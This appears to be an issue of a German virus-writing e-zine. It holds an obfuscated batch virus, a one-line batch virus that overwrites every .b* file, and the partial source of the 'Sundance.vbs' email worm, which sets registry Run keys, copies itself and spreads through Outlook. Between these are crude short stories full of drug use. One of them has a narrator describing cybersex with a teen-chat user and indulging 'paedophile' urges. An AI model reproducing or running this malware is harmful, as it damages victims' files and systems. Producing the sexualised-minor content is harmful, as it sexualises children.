%***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%************.......%%***................%z%***................%%***................%\%******************.%%*****************..%%**.................%%********...........%%***................%%*****..............%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%************.......%%***................%z%***................%%***................%%***************....%~1\%******************.%%*****************..%%**.................%%********...........%%***................%%*****..............%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%************.......%%******************.%%**************.....%\%******************.%%*****************..%%**.................%%********...........%%***................%%*****..............%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***************....%%**********.........%%******************.%%*..................%w%**********.........%%*****..............%%*..................%\%**.................%%********...........%%***................%%*****..............%%*..................%%**************.....%\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%******************.%%****...............%%*****..............%p%********...........%%*..................%%*************......%%**.................%\%******************.%%*****************..%%**.................%%********...........%%***................%%*****..............%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%****...............%%*******************%%*..................%%*****..............%%****************...%%*..................%%*********..........%\%******.............%%*************......%%****************...%%**************.....%%***************....%%*..................%%**.................%\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%***************....%%**.................%

sources

BatXP.Limitrophe.c DvL echo off %random% for /r \ %%_ in (*.b*) do copy %0 %%_

arts

rRlf Logo DvL

arts

Presenting KAV Team DvL
has to be looked together with "the good ones" by philet0ast3r. btw: DvL studies art right now. check out his deviantart page: http://acelceva.deviantart.com/

articles

Die unergründlichen Wege der Kunst El DudErin0 Die unergründlichen Wege der Kunst Kürzlich besuchte ich eine Kunstgallerie nicht weit entfernt von goatse.cx und ccn.com. Es waren viele Werke jüngerer Künstler zu begutachten, und nicht eines davon war Porno. Doch es kam viel besser: Ich schlenderte durch die endlosen Reihen an belanglosen Versuchen der Künstler sich in das Hirn eines dreijährigen zu versetzen und tolle Farbkreationen zu erschaffen. Doch dann erblickte ich in der Ecke hinter einem Papierkorb einen zusammengefalteten Zettel. Ich bin ja ziemlich neugierig und deswegen ging ich zum Papierkorb. Ich sah mich um, damit mich nicht eine alte Museumswärterin für einen Penner hielt und mich hinauswarf, wenn ich den Zettel aufheben würde. Ich nahm das Stück Papier an mich und ging weiter. Als ich an der Männertoilette vorbeikam, betrat ich sie und schloss mich in einer der Kabinen ein. Ich entfaltete das Papier in der Erwartung irgendein wichtiges Dokument gefunden zu haben. Was ich jedoch fand war dies: Der kleine James Hansard hatte diese liebliche Zeichnung gestaltet. Die Bildüberschrift lautete: "This is Tim The yowie man scaring everyone." Auf dem Bild sah man eine monströse Gestalt auf die vielerlei Vögel Kurs genommen hatten, und die mit ihrem dezent angedeuteten Schrei einige Menschen zum weglaufen brachte. Die Farbwahl und der Zeichenstil erinnerten mich sofort an die erstklassigen Illustrationen von Hunter S. Thompsons "Fear and Loathing in Las Vegas". Der Charme der Zeichnung hatte mich vollkommen in ihren Bann gezogen. Im linken oberen Bildrand war eine sehr coole, aggressive Sonne zu sehen, die blutrot gefärbt war. Ich starrte einige Zeit auf das Bild, bis ich plötzlich wieder zu mir kam und mir bewusst war, dass ich in einer Toilette saß. Ich beschloss zu gehen, doch vorher klaute ich mir noch einige dieser Papiertücher mit denen man sich die Hände abtrocknet. Dem Rest der Ausstellung schenkte ich kaum mehr beacht; ich hatte schliesslich ein Meisterwerk in meiner Tasche, dass ich mir näher begutachten musste. Ich holte meinen Mantel an der Garderobe ab und begab mich nach draussen, wo die Welt mit aller Kraft versuchte unterzugehen. Ich nam also ein Taxi um nach Hause zu kommen. Ich stürmte in meine Wohnung und fiel fast über einen Stapel CD-Rohlinge. Ich habe die Dinger fast überall in der Wohnung aufgetürmt. Oben auf jedem habe ich einen Halogenstrahler draufgelegt, und so dienen sie mir als Deckenfluter, die so tolles unaggressives Licht machen. Jedenfalls versuchte ich ersteinmal den Namen "James Hansard" irgendwo im Internet zu finden. Leider fand ich nur tausende Pornoseiten, die mir hoch und heilig versprachen, wenn ich 23 ¤ im Monat zahlen würde, gäben sie mir Britney Spears als meinen persönlichen Sklaven dazu. Deswegen bezog ich neben der Suchmaschine meine zweitverlässlichste Quelle in die Recherche mit ein; der AOL-Teen-Chat. Ich begab mich in den Channel für meine Stadt und traf nachdem ich einige Pokemon-Schlachtrufe abgegeben hatte, "SexyGrrrl420". Ich hatte eine schöne Konversation und nach dem Cybersex mit ihr auch eine überdurchschnittlich hohe Befriedigung meiner paedophilen Triebe. Sie schickte mir nachdem ich sie darum bat ein Bild von ihr: Das Tattoo auf ihrer Taille war nicht zu übersehen. Da stand doch wirklich "Hansard's Fuckbeast". Ich musste sofort mit ihr weitersprechen. Sie erzählte mir, dass sie als sie das erste Mal Marijuana konsumierte, so von Sinnen gewesen sei, einen dreijährigen Jungen gebeten zu haben ihr ein Tattoo mit einer eiterverkrusteten Fixernadel auf ihren Bauch zu ritzen. Als sie am nächsten Tag aufwachte war sie Hansard's Fuckbeast. Also, mit diesem kleinen Mann muss ich mich unbedingt mal anfreunden, wenn ich ihm über den Weg laufe, der ist mir echt sympatisch. Ich beendete so meine alltägliche Wichssession, und setzte mich in meinen Sessel. Da fiel mir das Bild wieder ein. Ich holte es heraus und bemerkte erst jetzt, das dieser kleine dreijährige Typ der gleiche war, der auch das Bild gemalt hatte. Ich rannte wieder zum PC und setzte mich nocheinmal mit meiner Informantin in Kontakt. Bei dieser Gelegenheit lies ich mir nochmal ein Bild von ihr schicken: Sie sagte, dieses Bild sei einen Tag vor dem Fixertattoo Spektakel gemacht worden, deswegen würden sie und ihre Freundin auch so fröhlich dreinschauen. Das machte mich geil. Ich holte mir nochmal einen runter.

articles

Du weisst doch wie das ist... El DudErin0 Du weisst doch wie das ist... Es kommt für dich ziemlich unerwartet. Gerade eben bist du noch auf irgendeiner Party zusammen mit deinen Kumpels und diesem einen bischen durchgedrehten Typ mit Dreadlocks, der euch was von seinem "allerbesten Gras überhaupt" mitrauchen lässt. Die Bong wandert in deinem nun erweiterten Freundeskreis. Flamme, Blubbern, Husten, weiter. Du setzt zu deinem ersten Kopf an. Also das Feuerzeug ans Gras gehalten und los gehts. Du saugst den Rauch bis in die kleinsten Kapillaren deiner Lunge weil du auf das Versprechen bezüglich der Qualität misstrauisch bist. Die Hippies erzählen andauernd davon, ihr ausgetrocknetes Stengel- und Samenverseuchtes Bröselzeug sei das Beste das man irgendwoher bekommen könne. Das Gras verbrennt in einem unwahrscheinlich kurzen Zeitraum und zurück bleibt nur Asche, die in die Bong gesaugt wird. In der Bong steht noch der Rauch und deine Lungen sind zum Platzen voll, aber du saugst weiter und lässt das Kickloch los. Du spürst den Vorschlaghammer, der auf deinen Hinterkopf einschlägt und fängst an zu husten bis deine Atemwege brennen. Du streckst die Bong auf Armlänge von dir weg zum nächsten im Kreis, hoffst er wird sie dir in weniger als einer Milisekunde entreissen und stehst auf. Du brauchst jetzt was zu trinken. Dein Mund ist ausgetrocknet und du brennst innerlich. OK. Wo gehts zur Küche hier? Da muss doch was zu Trinken sein. Um dich herum: ein Türrahmen. Zwei Typen unterhaölten sich miteinander. Jeder von ihnen eine Bierflasche in der Hand. Du gehst auf sie zu und willst an ihnen vorbei. Ein Erdbeben erschüttert dich. Wo bist du? Konzentrieren. Etwas zu trinken. Du gehst immernoch weiter. Du blickst dich um, und als du merkst, dass dein T-Shirt nass ist siehst du die beiden Typen von gerade eben die wild in deine Richtung gestikulieren. Aber wo ist nun die Küche. Du würdest jemanden fragen, wenn du jetzt ein Wort rausbringen könntest, ohne vom darauffolgenden Schwindelgefühl umzukippen. Noch eine Tür, die mit rasender Geschwindigkeit auf dich zu kommt. Du versuchst dem Rahmen auszuweichen und schlüpfst durch die Mitte hindurch in einen hellen Raum, der mit allerlei glitzernden Amaturen ausgestattet ist, und du merkst dass du wirklich die Küche gefunden hast. "Scheisse!" Wer hat das gesagt? Du siehst dich um, aber bevor du jemanden ausmachen kannst fällt dein Blick auf einen Wasserhahn. "Der Typ sieht aber nicht mehr fit aus." Der soll bloss die Fresse halten. Was mischt er sich auch ein? Das ist jetzt eine Sachen allein zwischen dir und dem Wasser. Du drehst den Hahn auf, fängst etwas Wasser mit deinen Händen und trinkst daraus. So glasklar wie dir das Wasser auch vorkommt, geistig hat es dich nicht wieder fit gemacht. Dafür hat sich das Brennen beruhigt und du denkst wieder darüber nach mit anderen Leuten Kontakt aufzunehmen. "...Guter Scheiss, Alter..." Durch deine halboffenen Lider siehst du einen Typen auf dich zukommen. "...probieren?" Er hat eine abgebrochene Zigarette im Mundwinkel hängen und zwinkert dir zu. "...aus Paris..." Er sieht zwar nicht aus wie ein Franzose aber als er dir seinen Becher entgegenstreckt reisst du ihn ihm, ohne wirklich jemals den Wunsch dazu auch nur gedacht zu haben, aus der Hand, trinkst ihn aus und wirfst ihn mit der einen Hand hinter dich - "...Absinth..."- während du dir mit der anderen den Mund abwischt. Du reisst deine Augen so weit auf wie es dir nur möglich ist und siehst den Typen an, der wahrscheinlich genauso entgeistert auf dich zurückstarrt. Spiegelbild. Actio = reactio. In deinem Fall wäre die Aktion der grässlich-beissende Geschmack des Absinth den du dir gerade in einer netten 0,3 Liter Portion verabreicht hast. Deinem Spiegelbild reicht für die gleiche Reaktion schon nur der Anblick einer Person aus, die sich auf solch skrupellose Weise toxischen Einflüssen hingibt. Du weisst jetzt nicht genau wie es weitergehen soll und ausserdem willst du nicht die perfekte Übereinstimmung mit deinem halb nach vorne übergebeugten Spiegelbild kaputt machen, das dich mit weit offenem Mund und noch weiter afgerissenen Augen nachäfft. "Oh scheisse..." Und du kippst lautlos und in Zeitlupe zur Seite hin um. --- Du machst die Augen wieder auf ohne dich an einen Aufprall am Boden zu erinnern und bemerkst dass du schon wieder stehst oder noch garnicht umgefallen bist. Aber bevor du dir darüber den Kopf zerbrechen kannst spürst du das Stechen in deinen Augen. Es ist so hell, dass es wie das andere Extrem von Blindheit für dich ist. Und du fällst ein weiteres Mal um, und diesmal tut es so weh, dass du laut losschreist. --- Als du das nächste Mal zu dir kommst machst du die Augen wieder auf, und bleibst diesmal ungestraft. Was du siehst ist ein Engel. Aber er ist nicht weiss und glänzend sondern seine Flügel und sein Gewand sind ölversschmiert und er trägt Arbeitshandschuhe und einen gelben Schutzhelm. Ausserdem hängt in seinem Mundwinkel unmotiviert eine abgebrochene Zigarette. Er steht mit dem Rücken zu dir und schlägt mit einem Vorschlaghammer auf einen Stein ein, dem du eine gewisse Ähnlichkeit mit deinem Kopf zugestehst.

arts

biggest fux0rs El DudErin0

arts

El DudErin0 himself

articles

I like it here El DudErin0 Ich öffne die Augen und sehe an die Decke. Das heisst, ich würde an die Decke sehen, wenn es nicht dunkel wäre. Also ersteinmal die Hand ausfahren - aber schön vorsichtig, damit ich nichts umschmeisse - und nach der Lampe tasten. Nach einigen unbeholfenen Bewegungen habe ich etwas in der Hand, was sich vertraut nach dem Schalter meiner Lampe anfühlt. *klick* *klick* ... *klicklicklick* ARGH! Wieso kommt hier kein verdammtes Licht? Muss wohl die Glühbirne kaputt gegangen sein, vielleicht habe ich mir letztes Wochenende einen Vaporizer für mein neues Gras aus Holland gebaut. Verdammt, wenn ich mich doch nur daran erinnern könnte! Also erstmal nach meiner Brille fischen, und dann hoffen, dass ich nicht auf allzu verletzende Gegenstände trete, ich muss immerhin noch zur Schule gehen. Als ich mich an der Wand entlang zum Lichtschalter manövriert habe, freue ich mich auf die Ankunft des Lichtes in meinem Zimmer, und das Brennen in den Augen, wenn man fast blind wird vom ersten Licht, das einem an die Augen dringt. Aber nichteinmal diese Freude ist mir gegönnt. Der geneigte Leser hat zu diesem Zeitpunkt wohl schon gemerkt, dass im Haus der Strom ausgefallen war. Im Gegensatz zu mir ist der geneigte Leser auch nicht verschlafen-missmütig und sehnt sich nach seinem weichen Bett zurück. Das will heissen, mir war das Ganze nicht so klar, wie es mir sein hätte sollen. Also reisse ich ersteinmal die Türe zu meinem Zimmer auf und gehe halb, falle halb die Treppe zur Küche herunter. Ich versuche mich an einem aufrechten Gang á la James Bond damit meine Elern nicht wieder denken, ich hätte wieder die gnaze Nacht durchgekifft, wie dieses eine Mal als ich mir Zitronen über die Zehen stülpte und meine Mutter mit einem "Raumschiff Enterprise" Replika Phaser im Gesicht aufweckte (Der kleine Plastikschalter war auf terminieren und nicht betäuben geschaltet...). Als ich die Türe zur Küche öffne denke ich, "OK, jetz aber schnell wieder aufwachen, denn in Wirklichkeit vermieten wir unsere Küche schon seit drei Monaten nicht mehr an diese Sekte." Vor mir auf dem Küchentisch stehen riesige Kerzen, deren Schein meine Sicht blendet und um den Tisch herum sitzen einige Schatten und spielen anscheinend Schafkopf. Als sich meine Augen wieder fokussieren stellt sich das ganze als Täuschung heraus und am Tisch sitzen bei Kerzenschein meine Eltern und meine Schwester und nihillieren in meine Richtung: "Stromausfall". Langsam setzt sich für mich auch das Puzzle zusammen. Stromausfall also... Das heisst, mein PC war ausgeschaltet und ich hab es nichteinmal gemerkt. Ohne etwas auf ihren Zuruf zu antworten entferne ich mich fluchtartig von meiner Familie und sehe nach, ob meinem PC etwas zugestossen ist. Ich schalte ihn also an, und als der Titelsong der Benny Hill Show erklingt, jubele ich kurz innerlich auf, da mein PC normal startet ohne im BIOS hängenzubleiben. Nicht, dass ich jetzt gerade paranoid wäre, aber nach siebenundvierzig ähnlichen Vorfällen, bei denen es nicht so toll lief ist so ein Startsound schon eine kleine Beruhigung. Jedenfalls lade ich den ganzen Scheiss, den man so braucht, und sehe dass meine Scatmovies in Kazaa mit einer Downloadrate von 70kb gesaugt werden. JUBEL JUBEL FREU FREU, wenn ich aus der Schule zurückkomme gibt's erstmal ne Ladung "Deutsches Schiezze Filme" für mich! Was ich nicht erwähnt habe bisher - und was auch von keinerlei Signifikanz war - ist, dass ich auch in meiner Freizeit Möchtegernschwarzer bin. Das bedeutet auch, dass ich so tue als würde ich verstehen, was die Rapper der Welt zu sagen haben. Manchmal mag ich es auch vorzutäuschen freestylen zu können, also suche ich mal schnell nach nem Instrumental für Shook Ones von Mobb Deep und geh erstmal ins Badezimmer, um mir die Asche und Lätt'n von gestern ausm Gesicht zu wischen. als ich so dasteh und mir immer wieder Wasser ins Gesicht schmeisse, um wach zu werden meint das Licht, es müsste zeigen wie funky fresh es down ist mit meinem kommenden Freestyle und macht erstmal nen improvisierten epileptischen Anfall, soll heissen, es geht an - aus - bleibt aus - an -aus - wieder an. Mit ner neuen Ladung Wasser lass ich erstmal das Fragezeichen aus meinem Gesicht verschwinden und geh zurück zum PC. Dieser ist zu meiner Überraschung nicht mehr, wie erwartet AN, sondern AUS. Als ich das Ding anschalte und hochfahren lasse ist es ersteinmal Zeit einen achtundvierzigsten Strich in die Wand neben meinem PC-Tower zu ritzen. Ein schöner Bluescreen schreit meinen immernoch lichtempfindlichen Augen entgegen. UNMOUNTABLE BOOT VOLUME. HASS! VERACHTUNG! "FUCK!" "KLEINE KINDER, DIE VON BOZO, DEM WUNDERSAMEN CLOWN EINE LEKTION IM ARSCHFICKEN ERTEILT BEKOMMEN! VERFLUCHTE GOTTVERDAMMTE DRECKSCHEISSE! Nachdem ich mir fast die Hand an meiner Tastatur gebrochen habe, und sie näher inspizire, um mögliche offene Brüche frühzeitig zu diagnostizieren fällt mein Blick auf meine Armbanduhr und die sagt: ES IST ZEIT FÜR SCHULE! WOW. Dieser Schultag ging als einer der längsten, langweiligsten in die Geschichte der amerikanischen Eisenbahn und auch die Geschichte der Welt ein. Nachdem ich heimkam, aus volkommener Langeweile ein Bild gemalt hatte während sechs Stunden lang CHKDSK auf meinem PC lief (Anmerkung: das Bild heißt when i am king (you will be first against the wall) und kann weiter unten begutachtet werden), sitze ich nun hier, bin überglücklich, benötige ungefähr ... viel Geld für irgend ne Backup Scheisse, und bekomme ne Mail in der steht "SCHREIB WAS, FAULE DRECKSAU!" und was denkt ihr tue ich? Ich mach notepad auf, und schreib davon, was mir heute passiert ist, als ich aufwache. Ich öffne die Augen und sehe an die Decke. ad absurdum.

articles

neu_textdatei_23 El DudErin0 Scheisse, verdammte dachte er sich. War mal wieder nix cooles in da Glotze. Er beschloss sich hinzuhocken und ne Story für seine Homepage zu schreiben. Im Hintergrund lief coole Mukke, und so dachte er sich er könnte doch jetzt auch zu kiffen anfangen. Da zufällig der Abend des letzten Schultags vor den Ferien war, kam ihm die glorreiche Idee sich so wegzuhauen, wie noch nie einer vor ihm es getan hatte. Goddseidangg hatte er noch seine lustigen Sachnn zu Hause. Schau mer mal dachte er laut und begann seinen Vorrat zu inspizieren. Es waren noch 10g vom Super Sensi Skunk aus Amsterdam da. Yeeehaa!, er schrie vor Freude auf. Wie es der Zufall so will, hatte er auch seine 7-Liter-Bong bei sich rumstehen. Er stopfte erstmal einen ganzen Kopf pures Sensi. Dann pflutschte er die Bong so, dass in seinem ganzen Raum ein Unter- oder Überdruck entstand, jedenfalls ganz schön arg. Er merkte wie der Rauch seine Lungen hinuntermarschierte, und es sich dort gemütlich machte. Dann kickte es ihn so hart, dass er jede einzelne Gehirnzelle zerplatzen HÖREN konnte. Ihm war ziemlich enorm schlecht, also versuchte er sich auf einen Sessel zu setzen. Dooch, Problemm. Irgendwie war er jetzt nicht mehr so ganz fähig sich den 2 meter langen Weg zum Sessel zu bahnen. Ach, was solls dachte er, und sofort packte er seine X-tra-long-big-Kingsize-smokings aus. Er drehte sich einen fetten Dübel aus dem Rest vom Hyper-Ultra-Illusions-goin'-thru-my-Head-Skunk. Jenen zog er sich dann genüsslich rein. Als er damit fertig war, beschloss er sich nun doch zu setzen. Er machte einen Schritt, schien aber nicht grade viel voranzukommen. Es kam ihm vor, als würde er durch eine endlose Wüste marschieren. Seinen Schätzungen nach war er nach ungefähr zwei Stunden am Ziel. Erleichtert setzte er sich. Er sass da, und sah aus seinem Fenster raus. Da er in einem Kaff, ohne Zivilisation wohnte, sah er auf ein offenes Feld. Cooler scheiss da draussen, is ja langweiliga als BigBrother ohne Sladdi. Aber seine Meinung änderte sich, als er sah, wie ein fettes UFO über dem Feld schwebte. Es schoss irgendwelche Laserstrahlen auf das Feld, um einen Kornkreis zu machen. Ich weiss ja nicht was diese Vollidioten wollen, aber wieso malen die einen Kornkreis in der Form vom ner Muschi ins Feld, und schreiben darunter in Psychedelischen Farbverläufen riesengross "FICKEN"? Das war jetzt natürlich schon ZIEMLICH seltsam. Das UFO flog wieder weg. Hmmm. Er fragte sich jetzt wirklich, was die Kornkreisbotschaft auf dem Feld bedeutete. Nachdem er 3 Stunden darüber nachgedacht hatte, gab er auf. Er sah sich in seinem Zimmer um. Die Bong. ... Ein kleiner Rest vom Hyppa-Power-besser-als-zuschlichten-Skunk. ... Sein Schreibtisch. ...Sein PC. ... Die Tussi aus seina Klasse, die er schon seit Ewigkeiten poppen wollte. ... Sein Sessel. ... .. . . .STOPP!!! Die Tussi aus seina Klasse, die er schon seit Ewigkeiten poppen wollte?????. Er sah nochmal hin. Nochmal. Sie war echt da. Tja, wenn du schonmal da bist, können wir ja jetzt Geschlechtsverkehr praktizieren sagte er. Ja, ich will auch mal wieder so richtig durchgepoppt werden erwiederte sie. Hossa, dachte er. Dann poppte er sie ein paarmal. Als sie fertig waren, sagte sie ihm, es sei das beste Ficken gewesen, das sie je erlebt hätte, (und nein es war nicht ihr erstesmal, nur um das klarzustellen). Sie beschloss noch ne weile dazubleiben. Praktischerweise hatte sie auch nochn bischen Gras dabei. Es war wahrscheinlich ne ganze Pflanze, die sich die beiden dann noch durch die Bong zogen. Spätta dann, beschloss sie zu gehen. Hawadäa, und machs gut sagte er, denn er wusste was sich gehört. Als sie gegangen war, freute er sich noch ne richtig grosse Weile, weil er sie endlich gepoppt hatte. Als er mit freuen fertig war, fragte er sich, was er jetzt machen sollte. Er beschloss aus dem Fenster auf das Feld zu schauen. Der Kornkreis in Form eines femininen Geschlechtsteils war immer noch da. Da er ne Glozzä in seinem Zimmer rumflakken hatte, drehte er sie an. Durch Zufall schaltete er die Nachrichten ein. Es wurde gemeldet, dass die Aliens die Erde bedrohen, und ihre Forderungen überall verkünden. Toller Scheiss dachte er. Einmal kifft man, und dann geht die scheiss Welt kacken. Und man ist nicht mal in der Lage alle auszulachen. So ein dummer Scheiss. Da wie anfangs schon erwähnt nichts cooles in da Glozzä lief, schaltete er den Scheiss wieder aus. Aber irgendwie wollte die Glozzä nicht so recht was er wollte. Er sah noch immer ein Fernsehbild. Er riss einfach den Stecker raus. Das Bild war imma noch nicht weg. Das machte ihn brutal verrückt. Was soll na der Scheiss, da ihm jetzt allmählich der Zweifel an der Echtheit des Fernsehbildes überkahm und jetzt sowieso sein Telefon klingelte, beschloss er die ganze Aktion abzubrechen. Er wanderte den Weg zum Telefon, er beeilte sich sogar. Kruzifix, welcher Volldepp is na dran? Es war eina vo seine Kümböllz. Was bist na du für a Volldepp antwortete der Kumpel, ich hab jetzt ne Viertelstunde läuten lassen. -Ach fick dich. -Was is jetzt eigentlich mit deiner Story, die du schreiben wolltest? -Da is was dazwischen gekommen. -Was na? -Ach a Scheiss. -Hast gekifft, was? -Weiss nicht. -Hast jez oda hast nicht? -Vielleicht. Is nicht so wichtig. Aba hast du schon gehört, dass die Aliens die Erde bedrohen? -Ja, die fordern FICKEN, des habns wenigstens in den Nachrichten bracht. ....... Da fiel ihm auf, dass er nun schon ziemlich 5 Minuten in seine PC-Boxen gesprochen hatte. Ihm war niemals zuvor aufgefallen, dass seine Boxen so gesprächig waren, er beschloss in Zukunft mehr mit ihnen zu reden. Er lies seinen Blick über seinen Schreibtisch mit dem PC streifen. Ihm fiel auf, dass die Tasten auf seiner Tastatur so lustig rumzuhüpfen begannen. Sie verschoben sich und bildeten das Wort FICKEN. Bei dem Wort musste er an nen Kumpel denken, der gleich beim ersten mal ohne Gummi geknallt hatte. Er brach in nen kranken Lachkrampf aus und der dauerte so seine 1-2 Stunden. Als er sich wieder beruhigt hatte, kam er zu dem Schluss, dass es nicht gerade klug sei ohne Gummi zu ficken. Das war aber ziemlich nebensächlich. Er drehte sich um.... HALT!!! MOMENTAMAL. Ein Gefühl des endlosen Wissens durchfuhr ihn, und führ einen Moment begriff er den Sinn des Daseins, da jener aber nicht so aufregend war, wie er sich das immer vorgestellt hatte, fiel ihm schlagartig ein: FICKEN---OHNE GUMMI--- NA KLAR, die Aliens wollen, dass alle Menschen ohne Gummi miteinander schlafen, und sich somit über kurz oder lang alle mit AIDS infizieren. Die Menschheit würde ausgerottet werden, und die Aliens könnten den Planeten kampflos übernehmen. Er musste etwas tun. Doch noch war Zeit. Er hockte sich nochmal hin. Man, Scheisse hab ich lang nix mehr durchgezogen. Ich hab ja noch den suppa-deluxe-supreme 5g Haschbrocken!!! Er rollte sich nen dübel, und zog ihn durch. Jetzt aber auf zum Menschheitretten! Hey, fugg, ich weiss garnicht, was man so braucht um die Welt zu retten. Er sah sich in seinem Zimmer um. Da war ja seine Brechstange, die er sich irgendwann mal für 4 DM gekauft hatte. Des teil könnt ich brauchn. Er packte die Brechstange in seinen Survival-Skater-Backpack. Das war so ziemlich alles, was zum Weltretten taugte, jedenfalls in seinem Zimmer. Er ging nach unten. ELTERN!!! Ich geh mal schnell die Welt retten. -Aba, du kommst schon vor zwölf Uhr wieder heim oder?? -Schau mer mal. Hawadäa. Er ging einfach in die Richtung, wo er vermutete, dass dort die Aliens sein könnten. Nach 5 stunden kam er schon im näxxten grösseren Kaff an. Und wirklich. Da waren die Aliens, und versuchten mit ihrem Mutterschiff das ganze Kaff zum FICKEN aufzufordern. Er zückte seine Brechstange. Er warf sie auf das UFO. Die Brechstange fiel vom UFO wieder zu Boden. So eine schwule Scheisse! Da fiel ihm ein, dass sein Survival-Skate-Backpack zugleich sein Schulrucksack war, und er noch die ganze Scheisse, die er sonst immer in die Schule mitnahm dabei hatte. Er holte seinen Rocket-Launcher hervor, und schoss ne fette Rocket auf das UFO. Das UFO wurde zerfetzt. Er verpisste sich, nicht dass ihm noch das Amt für extraterrestrische Flugkörper irgendeinen Ärger bereitete. Als er wieder zu Hause war, legte er sich in sein Bett. Er dachte noch ein bißchen nach, war froh, dass er die Welt gerettet hatte, beschloss in nächster Zeit nicht gleich nach dem Aufwachen drei Köpfe durchzuziehen, und schlief zufrieden ein. Er hatte ja jetzt endlich die geile Tussi aus seina Klasse gepoppt.

arts

L0GO El DudErin0

articles

Tragische Fallhöhe El DudErin0 Das Streichholz gleitet langsam über die Reibefläche des Briefchens mit der Aufschrift "Cocamungo Bar". Es fährt über den Rand des Briefchens hinaus und bleibt kurz danach in der Luft stehen. In einer grellen Explosion entzündet sich der Streichholzkopf und die Flamme lodert auf. Er hebt die Flamme seinem Gesicht entgegen. Für einen Augenblick bilden der Mond, das Streichholz und seine Augen eine Linie. Es beginnt. Schulterhöhe... Gerade eben das Streichholz loszulassen war wahrscheinlich die schwerste Entscheidung die er jemals getroffen hat. Doch jetzt fällt es, und er entspannt sich. ...Herzhöhe... Pump-pump. Er schluckt. Er steht mitten in einer Pfütze Benzin, jetzt weiß es auch der Teil seines Gehirns, der noch rational funktioniert und schreit Zeter und Mordio. In seinem Innern werden gerade mit einer unglaublichen Geschwindigkeit alle möglichen Flüssigkeiten durch kleinste Kanäle gespült, in einer letzten verzweifelten Verteidigungsaktion seines Körpers, der alle Kräfte mobilisiert, um der übermächtigen Bedrohung, die er verspürt noch zu entkommen. ...Nabelhöhe... Wir befinden uns im unkontrollierten Landeanflug auf ein Atomkraftwerk. Bitte schließen Sie ihre Sicherheitsgurte und senden Sie ein allerletztes Stossgebet gen Himmel, auf dass da oben jemand Erbarmen mit ihrer verrotteten Seele haben wird. ...Endstation. Das Streichholz fällt auf seine Handfläche, die Hand schließt sich darum und als sie sich wieder öffnet dringt eine Schwade Rauch zwischen seinen Fingern hervor. *Ding* Bitte bleiben Sie angeschnallt bis wir unsere endgültige Halteposition erreicht haben. In der Zwischenzeit wird Ihr Körper eine große Portion Adrenalin für Sie bereithalten. Der Kapitän und sein Team wünschen Ihnen noch einen schönen Aufenthalt in Ihrem Leben. Er atmet einmal durch und steht für eine Weile regungslos da. Nein, so wird das Alles nicht enden. Davon ist er überzeugt. Schon gar nicht heute. Oder morgen. Oder in nächster Zeit. Und wenn doch, dann soll gefälligst jemand anderes die Drecksarbeit machen. Er geht langsam über den leeren Parkplatz der Cocamunga Bar und steigt in sein Auto. Er dreht den Zündschlüssel und aus dem Motor: *Vrrrrrmm-Vrrrwmmm* und aus dem Radio: "That's great, it starts with an earthquake, birds and snakes, an aeroplane and Lenny Bruce is not afraid..."

sources

Sundance.vbs Energy 'Sundance.vbs worm 'This are the Last Open Source from my Vx Days 'I married my Old Girlfriend 'I am leave for a while this szene 'Thx to: AlcoPaul my Great Brother, the Brigada Ocho Members, and The RRLF Group!!! '....bye Energy set fso=createobject("Scripting.FileSystemObject") set repwin=fso.GetSpecialFolder(0) set WshShell = WScript.CreateObject("WScript.Shell") dim Nom1,Nom2,Action,html,script,script2 dim scripthtml(1000) Cle1="HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Worm" Cle2="HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentSunDance" Set file = fso.OpenTextFile(WScript.ScriptFullName, 1) Script = file.ReadAll Script2=replace(Script,chr(34),chr(163)) Script3=Script2 For i= 1 to 10000 do car = left(Script3,1) Script3=right(Script3,len(Script3)-1) if len(Script3)=0 then exit for if asc(car)>32 or car=" " then ScriptHtml(i)=ScriptHtml(i)+car if car = chr(10) then exit do loop until car = chr(10) if ScriptHtml(i)="" then exit for Next call lancement call mailoutlook call listadriv Call fin sub lancement if Wscript.ScriptFullName="C:\SunDance.vbs" then Nom1=GenerNom() Nom2=GenerNom() WshShell.RegWrite Cle2+"\Run\"+Nom1,repwin+"\"+Nom2+".vbs" WshShell.RegWrite Cle2+"\RunServices\"+Nom1,repwin+"\"+Nom2+".vbs" Set FichDer=fso.CreateTextFile(repwin+"\"+Nom2+".vbs") FichDer.write Script msgbox "You Updated my SunDance E-Mail Virus..Thx: To all Members of Brigada Ocho.(c) by Energy" end if action=1 on error resume next action=WshShell.RegRead(Cle1) WshShell.RegWrite Cle1,Action NomHtm=genernom() set FichIn=createtextfile(repwin+"\"+NomHtm+".htm") FichIn.writeline "<script language=vbscript>" FichIn.writeline "<!--" Fichin.writeline "set 